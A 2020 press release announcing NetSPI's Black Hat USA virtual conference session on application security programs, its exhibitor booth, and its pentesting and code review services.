NetSPI to Help Black Hat USA 2020 Attendees View Penetration Testing and Application Security Through a New Lens

During the Black Hat 2020 Virtual Conference, NetSPI, a leader in enterprise security testing and vulnerability management, will provide a fresh perspective on optimizing pentesting and application security (AppSec) programs. Today, there are more software-based solutions than ever before. From rising dependency on smartphone applications to the growing remote workforce increasing the usage of cloud-based software, reliance on software continues to grow. This means more AppSec security tools and automation have become available – and, in-turn, an overwhelming number of AppSec methodologies and approaches to follow. To navigate the complex security considerations, NetSPI is working to change the way organizations think about AppSec by embracing security throughout the development lifecycle.

Who:
Deke George, CEO, NetSPI
Aaron Shilts, President and COO, NetSPI
Nabil Hannan, Managing Director, NetSPI
Jake Reynolds, Product Manager, NetSPI


What
:
On Wednesday, August 5, at 11:20–11:40am PT, NetSPI Managing Director Nabil Hannan and Product Manager Jake Reynolds will host a session titled, Extreme Makeover: AppSec Edition. During the session, attendees will learn how leading organizations use different discovery techniques as part of their AppSec program, understand strengths and weaknesses of common AppSec vulnerability discovery technologies and adopt techniques that make security frictionless for your developers as they embrace a DevSecOps culture. Additionally, they will discover how functional your application security program can be with a “makeover” to:

  • Enhance reporting to empower leadership to optimize AppSec programs
  • Improve vulnerability ingestion, correlation, and enrichment
  • Increase speed to remediation

The NetSPI team will have a virtual exhibitor booth in the Black Hat Business Hall. Schedule a briefing to hear the latest company updates and explore NetSPI’s new products and services, including:

  • Static Application Security Testing [SAST] and Secure Code Review [SCR]: Debuted at Black Hat, the new services are designed to identify application security vulnerabilities earlier in the software development life cycle.
  • Strategic Advisory Services: In June 2020, NetSPI revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, business-objective driven, and mature application security program.
  • Pentesting as a Service (PTaaS): Launched in 2020, NetSPI’s PTaaS delivery model puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and adding the ability to perform always-on continuous testing.


When
:
Virtual Session: Wednesday, August 5, 11:20–11:40am PST
Black Hat 2020 Virtual Conference: August 1-6, 2020


Where:
Attend the virtual session, Extreme Makeover: AppSec Edition, online here.
Stop by NetSPI’s virtual booth by searching for NetSPI in the Black Hat event portal.


Media
:
Virtual briefings with the NetSPI team available upon request. To attend the virtual session on August 5, register for a free Black Hat Business Pass.


Contact:
Tori Norris
Maccabee Public Relations on behalf of NetSPI
tori@maccabee.com, (612) 294-3100

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X